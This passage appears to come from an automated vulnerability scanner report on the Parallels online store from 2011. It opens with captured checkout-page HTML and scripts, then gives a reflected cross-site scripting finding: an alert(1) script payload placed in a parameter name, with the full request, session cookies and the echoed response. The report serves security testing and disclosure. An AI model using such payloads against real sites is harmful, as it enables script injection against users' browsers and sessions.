// Re-labelling and repositioning the Upsell Interstitial "Continue" (with purchase) link and
// Re-labelling and repositioning the Upsell Interstitial "Upgrade" button
$('#dr_productUpSell form div#dr_siteButtons').replaceWith('<div id="acceptOfferInput"><input class="dr_acceptOffer" type="submit" value="Upgrade your purchase"/></div><div id="origPurchCont"><a href="/store/para/en_US/DisplayShoppingCartPage">Continue with original purchase</a></div>');

//Remove text from Upsell
$('#dr_productUpSell h1').hide('');
//$('#dr_productUpSell #dr_offer ul li div.dr_product img').hide('');
//$('#dr_productUpSell h2').hide('');
$('#dr_productUpSell #dr_offer ul li div.dr_price').hide('');

// Changing the Continue Shopping Button Text
$('#dr_continueShoppingButton a.dr_button').css('background-color','#ffffff').css('font-size','10px').css('color','#0857A6').css('text-decoration','underline').css('float','left');
$('#dr_continueShoppingButton a.dr_button').html('&#60;&#60; Continue Shopping');

// Floating Credit Cards to the right
$('#creditCardLogos').css('float','right');

// Making Cart Total Bigger
$('td#dr_totals table tr#dr_priceTotal td.dr_price').css('font-size','12px').css('font-family','verdana');

// Removing text breadcrumbs
$('#dr_CheckoutBreadcrumb').hide('');

// Removing link from Product Name
$('#dr_ThreePgCheckoutShoppingCart td.dr_productName a[href!="/store/para/en_US/DisplayPage/id.ExtendedDownloadServiceMerchInfoPage"]').each(function(index) {
$(this).wrap("<span class='dr_productInfo'>"+$(this).html()+"</span>").remove();
});
// Adding rounded borders to Account Login Header
$('#dr_loginContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Account Login Information</td><td class="rightRound"></td></tr></table>');

// Adding rounded borders to Billing Info Header
$('#dr_billingContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Billing Information</td><td class="rightRound"></td></tr></table>');

// Adding rounded borders to Additional Info Header
$('#dr_optInContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Additional Information</td><td class="rightRound"></td></tr></table>');

// Adding rounded borders to Payment Info Header
$('#dr_paymentContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Payment Information</td><td class="rightRound"></td></tr></table>');

// Styling Gray Headers
$('.loginTable').css('background-color','#a0a0a4').css('height','26px');
$('td.leftRound').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/leftroundcorner_v2.gif)').css('background-repeat','no-repeat').css('background-position','left').css('height','26px').css('font-family','verdana').css('font-size','13px').css('font-weight','bold').css('color','#fff').css('background-color','#a0a0a4');
$('td.rightRound').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/rightroundcorner_v2.gif)').css('background-repeat','no-repeat').css('background-position','right').css('height','26px').css('width','10px');

// Changing add buttons on Thank You Page
$('#dr_thankYouElementContainer .addOnOffer').css('height','25px');

// Remove refresh button on Quantity
$('#dr_shoppingCartTable input.dr_refreshQtyImage').remove('');

// Styling sub-Cart refresh button
$('input.dr_refreshQtyImage').css('float','right').css('margin','10px 0px 10px 0px');

// Remove remove header
$('th.dr_remove').html('');

// Float the Currency Selector to the right, move it up higher
$('#dr_currencySelector').css('right','10px').css('position','absolute').css('top','10px');

// Float the Checkout Button to the right, move it up higher
$('#dr_checkoutButton').css('right','0px').css('position','absolute').css('top','48px');

// Style the "Estimated Shipping" header
$('div#dr_shippingEst h3.shippingEst').css('background-color','#e6e6e6').css('padding','3px 0px 3px 10px');

// Centering Disclaimer and Changing Font
$('p#dr_cartPricingDisclaimer').css('font-size','11px').css('color','#565656').css('font-family','verdana').css('text-align','center');
$('div#dr_TCFooter').css('font-size','11px').css('color','#565656').css('font-family','verdana').css('text-align','center');

// Adding horizontal rule above the disclaimer
$('<div id="horizontalRule"><hr width="60%" color="#e5e5e5"></div>').insertBefore('p#dr_cartPricingDisclaimer');
$('#horizontalRule').css('width','100%').css('text-align','center').css('margin-top','80px').css('margin-bottom','5px');

// Login Button on Billing Page
$('input#dr_cc_login').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/continueButton.jpg)').css('background-repeat','no-repeat').css('width','77px').css('height','25px');

// Check box to opt-IN for en_US locale
$('#dr_optInEmail div.dr_formLine').replaceWith('<div class="dr_formLine"><label for="optIn" class="dr_label">We would like to keep you informed via email about product updates, upgrades, special offers and pricing. If you do not wish to be contacted via email, please ensure that the box is not checked.</label><input type="hidden" value="on" name="ORIG_VALUE_optIn"/><input type="checkbox" checked="checked" value="on" name="optIn"/></div>');

// Continue Button on Billing Page
$('input#checkoutButton').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/checkoutButton.jpg)').css('background-repeat','no-repeat').css('width','88px').css('height','23px');

// Top Submit Button on Verify Order Page
$('input#submitTop').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/checkoutButton.jpg)').css('background-repeat','no-repeat').css('width','115px').css('height','23px');

// Bottom Submit Button on Verify Order Page
$('input#submitBottom').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/checkoutButton.jpg)').css('background-repeat','no-repeat').css('width','115px').css('height','23px');

// Change Delivery Method to Delivery
$('table#dr_confirmTbl th.dr_deliveryMethod').html('Delivery');

// Remove border from dr_Content Table on Verify Order Page
$('table.dr_confirmTable').css('border','0px');

// Adding border to the Table
$('#dr_cartTbl > tbody > tr > td:first-child').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/lightGreyPixel.gif)').css('background-repeat','repeat-y');
$('#dr_cartTbl > tbody > tr > td:last-child').css('border-right','1px solid #e5e5e5');
// $('#dr_cartTbl > tbody > tr:last-child > td').css('border-bottom','1px solid #e5e5e5');
$('<tr><td colspan="5" style="padding:0; margin:0"><table width="100%" border="0" class="bottomCurveTable"><tr><td class="leftRoundBottom" width="12" style="background-image:url(/DRHM/Storefront/Site/para/cm/images/leftRoundBottom_v2.gif);background-repeat:no-repeat;background-position:0 0;height:9px;width:12px"></td><td class="middleLineBottom" style="background-image:url(/DRHM/Storefront/Site/para/cm/images/middleLineBottom.gif);background-repeat:repeat-x"></td><td class="rightRoundBottom" width="12" style="background-image:url(/DRHM/Storefront/Site/para/cm/images/rightRoundBottom_v2.gif);background-repeat:no-repeat;background-position:top right;height:9px;width:12px"></td></tr></table></td></tr>').appendTo('table#dr_cartTbl');

// Reposition the "Order Number" field on the Invoice page
$('<br /><br />').insertBefore('#dr_Invoice span#dr_orderNumber'); // drop below the order date
$('<br />').insertBefore('#dr_Invoice div#dr_billingAddress');// add space between Ord num and bill addr

// Remove the parallels.com cs email link and form
$("#dr_TechnicalAssistance p:contains('parallels.us.cs@digitalriver.com')").remove();
$("#dr_technicalSupportSection p:contains('parallels.us.cs@digitalriver.com')").remove();
$("#dr_DownloadInformation p:contains('parallels.us.cs@digitalriver.com')").remove();
$("#dr_technicalSupportSection p:contains('OR')").remove();
$("#dr_contactFormSection").remove();

// Replace Payment Method dd on Order Info page
$('#dr_OrderInformation dl div.dr_q2 dd').replaceWith('<dd>We accept Visa&#174;, MasterCard&#174;, EuroCard, Discover&#174;, American Express&#174;, and Diner\'s Club&#174;, as well as PayPal, check cards and ATM cards if they are issued by one of these major credit card companies. We also accept checks, money orders, and wire transfers. If you choose to pay by check, money order, or wire transfer, you will receive instructions on how to send your payment once you submit your order.<p>Our servers encrypt all information submitted to them, so you can be confident that your credit card information will be kept safe and secure.</p></dd>');
// Remove "How do I start a new order?" from "Need Help?" page
$('#dr_Help #dr_helpColumnLeft #dr_orderInformationFAQ ul li.dr_q12').remove();
// Remove "How do I start a new order?" from Order Info page
$('#dr_OrderInformation dl div.dr_q12').remove();
// Replace "Can I order without a credit card?" dd on Order Info page
$('#dr_OrderInformation dl div.dr_q7 dd').replaceWith('<dd>Yes. In addition to credit cards we accept checks, PayPal, money orders and wire transfers. If you choose to pay by check, money order, or wire transfer, you will receive instructions on how to send your payment once you submit your order. </dd>');

// Change Refund Request URL on "Returns and Cancellations" page
$('#dr_ReturnAndCancellations dl div.dr_q3 dd').replaceWith('<dd>To request a refund, go to <a href="http://www.parallels.com/support" target="_blank">www.parallels.com/support</a>.</dd>');

//Updated Backup CD addon button on shopping cart page

$("#dr_ThreePgCheckoutShoppingCart div.addonDetailsButton a img, div.dr_candyRackChildProduct img.dr_buttonCandyRack").attr("src", "/DRHM/Storefront/Site/para/cm/images/Add_4.gif");

$('#dr_ProductDetails #dr_socialNetworkLinks').hide();

$('div.dr_candyRackChildProduct').insertAfter('h2.hdr-alpha');

</script>

<!--!/esi:include -->











<span class="opDefault" id="opmodule_para_bodyBottom"></span>
<script type="text/javascript">
ptomodule.displayModule('para_bodyBottom');
</script>









<script type="text/javascript">
var s_account = 'swsdev';
var omnChannel,omnProp2,omnProp4,omnEvents,omnProducts,omnState,omnZip,omnPurchaseID;
var omnPageName='ThreePgCheckoutShoppingCartPage';

</script>



<script type="text/javascript">
function omnitureProducts(prodString) { // convert FC string to Omniture string
rExp = /,/g;
rExp2 = /\?/g;
prodStringDelimiter = prodString.replace(rExp, ',;');
prodStringSeparator = prodStringDelimiter.replace(rExp2, ';');
s_products = ';'+prodStringSeparator;
return s_products;
}
omnPageName='Checkout: Shopping Cart';
omnChannel='Checkout';
omnProp2='Checkout: Shopping Cart';
omnProp4='Checkout';
omnEvents='scView';
if (typeof fc_prod_remove != 'undefined'){
omnProducts=omnitureProducts(fc_prod_remove);
omnEvents='scRemove';
}
if (typeof fc_prod_add != 'undefined'){
omnProducts=omnitureProducts(fc_prod_add);
omnEvents='scAdd';
}
if (typeof fc_prod_open != 'undefined'){
omnProducts=omnitureProducts(fc_prod_add);
omnEvents='scOpen,scAdd';
}
if (typeof fc_prod_view != 'undefined'){
omnEvents='scView';
}
</script>











   







<script type="text/javascript">

















































</script>
















   
   



   


       <script type="text/javascript">(function(){var cfsTrack = function(){setTimeout(function(){var img = new Image(1,1);img.src = '//7154200626---0---globalCommerce---0---173-193-214-243.cfspx.digitalriver.com/images/cleardot.gif';}, 100);};if (window.attachEvent) {window.attachEvent('onload', cfsTrack);} else {window.addEventListener('load', cfsTrack, false);}})();</script><noscript><img src="//7154200626---0---globalCommerce---0---173-193-214-243.cfspx.digitalriver.com/images/cleardot.gif" height=1 width=1 alt="" border="0" /></noscript>








<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/multimedia/Omniture/s_code_20102010.js"></script>
<script type="text/javascript">









</script>
<script type="text/javascript">
       s.pageName=omnPageName
       if (omnChannel) s.channel= omnChannel
       s.currencyCode='USD'
       s.charSet='UTF-8'
       if (omnProp4) s.pageType= omnProp4 // Page Type
       /* Traffice Variables */
       if (omnProp2) s.prop2= omnProp2 //Category
       if (omnProp4) s.prop4= omnProp4 // Page Type
       /* Conversion Variables */
       if (omnState) s.state= omnState
       if (omnZip) s.zip= omnZip
       if (omnEvents) s.events = omnEvents
       if (omnProducts) s.products= omnProducts
       if (omnPurchaseID) s.purchaseID = omnPurchaseID
       /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
       var s_code=s.t();if(s_code)document.write(s_code)
</script>













<!-- ################################ -->
<!-- ### BEGIN Google Custom, TOP ### -->
<script type="text/javascript">
   var _gaq = _gaq || [];

   _gaq.push(['_setAccount', 'UA-363966-1']);
   _gaq.push(['_setDomainName', '.parallels.com']);
   _gaq.push(['_setAllowHash', false]);
   _gaq.push(['_trackPageview']);

   (function() {
       var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
       ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';

       var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
   })();
</script>
<!-- ### END Google Custom, TOP ### -->
<!-- ################################ -->



<script type="text/javascript">
/* <![CDATA[ */
var google_conversion_id = 1067174464;
var google_conversion_language = "en_US";
var google_conversion_format = "3";
var google_conversion_color = "666666";
var google_conversion_label = "g5WWCMyrvQEQwJTv_AM";
var google_conversion_value = 0;
/* ]]> */
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
<noscript>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1067174464/?label=g5WWCMyrvQEQwJTv_AM&amp;guid=ON&amp;script=0"/>
</div>
</noscript>




   <!-- Thank You page and Your Order is Being Processed Page -->

   
       
   


<!-- begin retargeting pixel -->



<script src="http://display.digitalriver.com/?aid=244" type="text/javascript" defer="defer"></script>


<!-- end retargeting pixel -->













</body>
</html>
1.2. https://store.parallels.com/store/para/en_US/DisplayThreePgCheckoutAddressPaymentInfoPage [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://store.parallels.com
Path:   /store/para/en_US/DisplayThreePgCheckoutAddressPaymentInfoPage

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 424eb--><script>alert(1)</script>c5383a5a96a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/para/en_US/DisplayThreePgCheckoutAddressPaymentInfoPage?424eb--><script>alert(1)</script>c5383a5a96a=1 HTTP/1.1
Host: store.parallels.com
Connection: keep-alive
Referer: http://store.parallels.com/store?Action=DisplayPage&Env=BASE&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1299874733.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1331410733871%26vn%3D1; ORA_WX_SESSION="10.1.2.144:1028-0#0"; JSESSIONID=943A97EDDD493407ED3F48E4A043CCAD; VISITOR_ID=971D4E8DFAED436758C101F425550FD89CDA569B49779CFD; BIGipServerp-drh-dc1pod6-pool2-active=2416050442.1028.0000; RefURL=http%3A%2F%2Fwww.parallels.com%2Fstore%2Fsmall-business-panel%2Fwindows%2F; aspcms_sid=c268913546380a1096a063587ad8f09a; mbox=check#true#1299874834|session#1299874748891-562918#1299876634; op_browser=safari_534.16; op_browserHigh=safari; op_os=windows; s_cc=true; __utma=1.529009189.1299874733.1299874733.1299874733.1; __utmc=1; __utmb=1.3.10.1299874733; s_gpv_page=Checkout%3A%20Shopping%20Cart; s_invisit=true; s_nr=1299874774917-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=25401687187,0)
Date: Fri, 11 Mar 2011 20:19:11 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb04@dc1app61
Content-Length: 68007




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=meta.html"-->
<link rel="icon" href="/DRHM/Storefront/Site/para/cm/images/favicon.ico" type="image/x-icon" />
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/multimedia/commonFunctions.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/multimedia/Omniture/mbox.js"></script>
<!--!/esi:include -->
<link rel="stylesheet" href="https://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet&SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=style.css" type="text/css" media="all" />
<!--!esi:include src="/store?424eb--><script>alert(1)</script>c5383a5a96a=1&Action=DisplayESIPage&Currency=USD&ESIHC=d445603d&Env=BASE&Locale=en_US&SiteID=para&StyleID=26770400&StyleVersion=58&ceid=170596700&cename=TopHeader&id=ThreePgCheckoutAddressPaymentInfoPage&script>c5383a5a96a=1"-->






<!-- REQUEST ID: TIME=1299874751394:NODE=c1a6104:THREAD=5077; ESI Fragment - CREATED: Fri Mar 11 14:19:11 CST 2011 MAX-AGE: 28800+180 -->
<!-- BEGIN TOPHEADER -->
<!-- -->

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>Parallels, Inc. (para) Online Store - Billing</title>
<!-- Accessibility links for Home, Help, and Contents (Sitemap) -->
<link rel="home" href="/store/para/en_US/home" title="Home"/>
<link rel="help" href="/store/para/en_US/help" title="Help"/>
<link rel="contents" href="/store/para/en_US/sitemap" title="Sitemap"/>














<script type="text/javascript">
var q = true; // Page-level global variable

// Temporary popUp function that will be replaced by the overlay-enhanced version when the DOM is fully loaded
function popUp(popURL, popName, popWidth, popHeight) {
self.open(popURL, popName, 'width='+popWidth+',height='+popHeight+',resizable=yes,status=yes,screenX=50,screenY=50,top=50,left=50,scrollbars=yes');
}
</script>






<script type="text/javascript">



if (!window.jQuery) {
document.writeln('<scr'+'ipt type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.3.2.min.js"></scr'+'ipt>');
}

</script>









<script type="text/javascript">
var pageNameFlag = '';
</script>


<!-- Global OT: ptomodule object and browser-detection/cookie-setting -->
<script type="text/javascript" src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/OTGlobalCode.js"></script>
<script type="text/javascript">
var ot_Country = 'en_US';
</script>
<!-- Site-level OT, from PageBuilder page: OT_globalTrial -->
<script type="text/javascript" src="//atl.img.digitalriver.com/drso/drso-1.4.min.js"></script>
<script type="text/javascript">
if (typeof(optrial) !== 'object') {
optrial = {};
}
//set the cross-domain cookie for NCT Trial Reg test, and delete the download page session cookie (so the sale wil count toward NCT, not download page tests
if (drso.getSessionVar('op612nctfulfill0285001liid').length > 0){
drso.setCookie('op612nctfulfill0285001liid', drso.getSessionVar('op612nctfulfill0285001liid'), drso.getDomain(), null);
drso.deleteCookie('op612downloadparallelsdesktop5formaceliid');
}
</script>
<!-- End of OT_globalTrial -->

<!-- Page-level OT, from OT_ThreePgCheckoutAddressPaymentInfoPage_contentBody -->
<!--
Counter: para ThreePgCheckoutAddressPaymentInfoPage
Referenced context:
- Cookies: op612threepgcheckoutshoppingcartpageliid
Modified: The counter was last modified 2010-07-01 15:24 GMT.
Note: This script should be included in a secure (https) page.
-->

<script language="javascript" type="text/javascript">
<!--
var _o=(typeof opcounter=="object")?opcounter:new Object;_o.D=document;_o.L=_o.D.location;_o.T=
new Date;_o.Q=new Object;_o.C=new Object;_o.U="https://ssl.pto.digitalriver.com/by/counter/612/-/13/event.js";
_o.D_ts=Math.round(_o.T.getTime()/1000);_o.D_tzo=_o.T.getTimezoneOffset();_o.D_loc=_o.L.protocol+
"//"+_o.L.hostname+_o.L.pathname;_o.D_ckl=_o.D.cookie.length;_o.D_ref=_o.D.referrer;function
_oI(){var s=_o.L.search;var c=_o.D.cookie;if(s.length>3){for(var a=s.substring(1).split("&")
,i=0,l=a.length;i<l;i++){var p=a[i].indexOf("=");if(p>0)_o.Q[a[i].substring(0,p)]=unescape(a[i].substring(
p+1));}}if(c.length>3){for(var a=c.split(";"),i=0,b=a.length;i<b;i++){var v=a[i].split("=");
while(v[0].substring(0,1)==" ")v[0]=v[0].substring(1,v[0].length);if(v.length==2)_o.C[v[0]]=
unescape(v[1]);}}}function _oS(){var o=new Object;for(var n in _o)o[n]=_o[n];o.D=o.L=o.T=o.Q=o.C=
o.U=null;var q='';for(var n in o)if(o[n]!=null && o[n]!="")q+=(q.length>0?"&":(_o.U.indexOf(
"?")>0?"&":"?"))+n+"="+escape(o[n]);return _o.U+q;}_oI();for(var n in _o.Q)if(n.substring(
0,2)=="op")_o[n]=_o.Q[n];for(var n in _o.C)if(n.substring(0,2)=="op")_o[n]=_o.C[n];_o.D.write(
'<'+'script type="text/javascript" src="'+_oS()+'"><\/script>');
//-->
</script>

<!-- End of OT_ThreePgCheckoutAddressPaymentInfoPage_contentBody -->


</head>
<body>


<span class="opDefault" id="opmodule_para_bodyTop"></span>
<script type="text/javascript">
ptomodule.displayModule('para_bodyTop');
</script>



<!-- END TOPHEADER -->

<!--!/esi:include --><!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=body-section0.html"-->
<!--[if IE]
<style type="text/css">
#dr_productUpSell form div#dr_siteButtons {
margin-top:130px;
}
table#us_buttons {
margin:0px 0px 0px 225px;    
}    
</style>
-->

<table border="0" cellpadding="0" cellspacing="0" width="805" align="center">

<tr>
<td class="logo" width="667px"><h1><a href="//www.parallels.com/" title="Parallels"></a></h1></td>
<td id="secureInfo" width="138px"><!--SECURE-LOGO-->

<!--!/esi:include -->






<!-- REQUEST ID: TIME=1299874750732:NODE=c1a6104:THREAD=398 -->








<div id="dr_geoTrustIcon">
<!-- GeoTrust[tm] Smart Icon tag. Do not edit. -->
<script language="javascript" type="text/javascript" src="//smarticon.geotrust.com/si.js"></script>
<!-- end GeoTrust Smart Icon tag -->
</div>

<!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=body-section1.html"-->
       
<!--/SECURE-LOGO-->
</td>

</tr>
<tr>
<td class="breadCrumbsRed" colspan="2"><img src="/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_on.jpg" alt="Step 1 Cart" width="200" height="22" id="stepOne" /><img src="/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_off.jpg" alt="Step 2 Billing" width="200" height="22" id="stepTwo" /><img src="/DRHM/Storefront/Site/para/cm/images/bc_step3_verify_off.jpg" alt="Step 3 Verify" width="200" height="22" id="stepThree" /><img src="/DRHM/Storefront/Site/para/cm/images/bc_step4_complete_off.jpg" alt="Step 4 Complete" width="200" height="22" id="stepFour" /></td>
</tr>
</table>
<table border="0" cellpadding="0" cellspacing="0" class="main" align="center">
<tr>
<td><div id="content">
<!--!/esi:include -->




<span class="opDefaultContent" id="opmodule_para_ThreePgCheckoutAddressPaymentInfoPage_contentBody">







<style type="text/css">
.dr_ExpandPaymentDetailsSection {
font: 9px verdana, arial, sans-serif;
color: #999999;
background-color: #ffffff;
margin: 10px 25px 5px 40px;
padding: 3px 5px;
}
</style>















<!-- Splash Transformer Optimized -->










<!--..Layout: ThreePgCheckoutAddressPaymentInfoPage, Generated: Tue Mar 08 16:00:50 CST 2011..-->
<div xmlns="http://www.w3.org/1999/xhtml">
<div xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" id="dr_ThreePgCheckoutAddressPaymentInfo" class="dr_Content">
<div id="dr_CheckoutPayment">
<h1>Checkout</h1>
<div id="dr_CheckoutBreadcrumb">
<ul id="dr_breadcrumbTitles">
<li id="dr_bcCheckoutBilling" class="dr_titleOn">Billing</li>
<li id="dr_bcConfirmOrder" class="dr_titleOff">Verify Order</li>
<li id="dr_bcThankYou" class="dr_titleOff">Order Completed</li>
</ul>
</div>
<form method="post" action="/store/" name="CheckoutAddressForm">
<input name="Action" type="hidden" value="PostThreePgCheckoutAddressPaymentInfoPage"/>
<input name="SiteID" type="hidden" value="para"/>
<input name="Locale" type="hidden" value="en_US"/>
<input value="com.digitalriver.template.form.checkout.CheckoutForm" name="Form" type="hidden"/>
<input name="CallingPageID" type="hidden" value="ThreePgCheckoutAddressPaymentInfoPage"/>
<input type="hidden" name="CLS_DATA_ANALYTICS" value=""/>
<p>To complete your secure online order, please enter your billing information below. The billing information should be exactly as it appears on your credit card statement.</p>
<p class="dr_requiredFieldsInfo">*Fields marked with an asterisk (*) are required.</p>
<input type="hidden" name="ORIG_VALUE_BILLINGverazipInvalidAddress" value=""/>
<input name="BILLINGverazipInvalidAddress" value="" escape="no" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_SHIPPINGverazipInvalidAddress" value=""/>
<input name="SHIPPINGverazipInvalidAddress" value="" escape="no" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_operation" value="update"/>
<input name="operation" value="update" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_mode" value="anonymous"/>
<input name="mode" value="anonymous" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_enforceValidShippingOption" value="false"/>
<input name="enforceValidShippingOption" value="false" type="hidden"/>
<div id="dr_billingContainer">
<fieldset id="dr_billing">
<legend>Billing Information</legend>
<h3>Billing Information</h3>
<div class="dr_formLine">
<label class="dr_label" for="billingName1">
<span class="dr_required">First Name:</span>
<span class="dr_reqFieldIndicator cart-redasterisk">*</span>
<span class="dr_error" required="billingName1">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_BILLINGname1" value=""/>
<input name="BILLINGname1" value="" id="billingName1" type="text"/>
</div>
<div class="dr_formLine">
<label class="dr_label" for="billingName2">
<span class="dr_required">Last Name:</span>
<span class="dr_reqFieldIndicator cart-redasterisk">*</span>
<span class="dr_error" required="billingName2">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_BILLINGname2" value=""/>
<input name="BILLINGname2" value="" id="billingName2" type="text"/>
</div>
<div class="dr_formLine">
<label class="dr_label" for="billingCompanyName">Company Name:
<br/>
</label>
<input type="hidden" name="ORIG_VALUE_BILLINGcompanyName" value=""/>
<input name="BILLINGcompanyName" value="" id="billingCompanyName" type="text"/>
</div>
<div class="dr_formLine">
<label class="dr_label" for="billingAddress1">
<span class="dr_required">Address:</span>
<span class="dr_reqFieldIndicator cart-redasterisk">*</span>
<span class="dr_error" required="billingAddress1">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_BILLINGline1" value=""/>
<input name="BILLINGline1" value="" id="billingAddress1" type="text"/>
</div>
<div class="dr_formLine">
<label class="dr_label" for="billingAddress2">Apartment/Suite:</label>
<input type="hidden" name="ORIG_VALUE_BILLINGline2" value=""/>
<input name="BILLINGline2" value="" id="billingAddress2" type="text"/>
</div>
<div class="dr_formLine">
<label class="dr_label" for="billingCity">
<span class="dr_required">City:</span>
<span class="dr_reqFieldIndicator cart-redasterisk">*</span>
<span class="dr_error" required="billingCity">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_BILLINGcity" value=""/>
<input name="BILLINGcity" value="" id="billingCity" type="text"/>
</div>
<div class="dr_formLine">
<label class="dr_label" for="billingState">
<span class="dr_required">State/Province:</span>
<span class="dr_reqFieldIndicator cart-redasterisk">*</span>
<span class="dr_error" validate="billingState" checkCountry="billingCountry">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_BILLINGstate" value=""/>
<select name="BILLINGstate" id="billingState">
<option value="" selected="selected">Select One</option>
<option value="" selected="selected">*Not Applicable</option>
<option value="AL">Alabama</option>
<option value="AK">Alaska</option>
<option value="AB">Alberta</option>
<option value="AS">American Samoa</option>
<option value="AZ">Arizona</option>
<option value="AR">Arkansas</option>
<option value="AA">Armed Forces America</option>
<option value="AE">Armed Forces Europe</option>
<option value="AP">Armed Forces Pacific</option>
<option value="BC">British Columbia</option>
<option value="CA">California</option>
<option value="CO">Colorado</option>
<option value="CT">Connecticut</option>
<option value="DE">Delaware</option>
<option value="DC">District Of Columbia</option>
<option value="FM">Federated States of Micronesia</option>
<option value="FL">Florida</option>
<option value="GA">Georgia</option>
<option value="GU">Guam</option>
<option value="HI">Hawaii</option>
<option value="ID">Idaho</option>
<option value="IL">Illinois</option>
<option value="IN">Indiana</option>
<option value="IA">Iowa</option>
<option value="KS">Kansas</option>
<option value="KY">Kentucky</option>
<option value="LA">Louisiana</option>
<option value="ME">Maine</option>
<option value="MB">Manitoba</option>
<option value="MH">Marshall Islands</option>
<option value="MD">Maryland</option>
<option value="MA">Massachusetts</option>
<option value="MI">Michigan</option>
<option value="MN">Minnesota</option>
<option value="MS">Mississippi</option>
<option value="MO">Missouri</option>
<option value="MT">Montana</option>
<option value="NE">Nebraska</option>
<option value="NV">Nevada</option>
<option value="NB">New Brunswick</option>
<option value="NL">Newfoundland and Labrador</option>
<option value="NH">New Hampshire</option>
<option value="NJ">New Jersey</option>
<option value="NM">New Mexico</option>
<option value="NY">New York</option>
<option value="NC">North Carolina</option>
<option value="ND">North Dakota</option>
<option value="MP">Northern Mariana Islands</option>
<option value="NT">Northwest Territories</option>
<option value="NS">Nova Scotia</option>
<option value="NU">Nunavut</option>
<option value="OH">Ohio</option>
<option value="OK">Oklahoma</option>
<option value="ON">Ontario</option>
<option value="OR">Oregon</option>
<option value="PW">Palau</option>
<option value="PA">Pennsylvania</option>
<option value="PE">Prince Edward Island</option>
<option value="PR">Puerto Rico</option>
<option value="QC">Quebec</option>
<option value="RI">Rhode Island</option>
<option value="SK">Saskatchewan</option>
<option value="SC">South Carolina</option>
<option value="SD">South Dakota</option>
<option value="TN">Tennessee</option>
<option value="TX">Texas</option>
<option value="UT">Utah</option>
<option value="VT">Vermont</option>
<option value="VA">Virginia</option>
<option value="VI">Virgin Islands</option>
<option value="WA">Washington</option>
<option value="WV">West Virginia</option>
<option value="WI">Wisconsin</option>
<option value="WY">Wyoming</option>
<option value="YT">Yukon</option>
</select>
</div>
